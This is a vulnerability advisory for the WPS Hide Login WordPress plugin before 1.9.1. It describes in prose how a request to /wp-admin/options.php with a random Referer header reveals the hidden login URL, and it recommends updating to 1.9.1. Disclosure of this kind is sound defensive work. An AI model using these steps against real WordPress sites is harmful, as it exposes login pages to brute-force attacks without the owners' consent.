WPS Hide Login < 1.9.1 - Protection Bypass with Referer-Header

Vulnerability

The WPS Hide Login WordPress plugin before version 1.9.1 contains an authorization bypass vulnerability. An unauthenticated attacker can discover the secret login page (the custom slug set by the plugin) by making a request to /wp-admin/options.php with a random Referer header value. The plugin incorrectly handles the Referer check, allowing the disclosure of the hidden login URL. This affects all versions prior to 1.9.1. [1]

Exploitation

An attacker does not need authentication. The attack requires sending an HTTP GET request to /wp-admin/options.php with a crafted Referer header (any random string). The plugin's logic will then redirect the attacker to the secret login page, revealing the custom login URL. The attacker can then access the login page and attempt to log in. [1] Additionally, if the plugin is used on a subdomain and the main domain redirects to the subdomain, entering the main domain's /wp-admin/options.php can also expose the login URL. [2]

Impact

Successful exploitation allows an attacker to bypass the plugin's intended protection of hiding the login page. The attacker gains knowledge of the secret login URL, which can then be used to access the WordPress login form. This does not directly provide authentication, but it removes the obscurity layer, potentially enabling brute-force or other attacks on the login page. The impact is information disclosure of the hidden login page location. [1]

Mitigation

The vulnerability is fixed in version 1.9.1 of the WPS Hide Login plugin. Users should update to version 1.9.1 or later immediately. There is no known workaround other than updating. The plugin is available on the WordPress plugin repository. [1]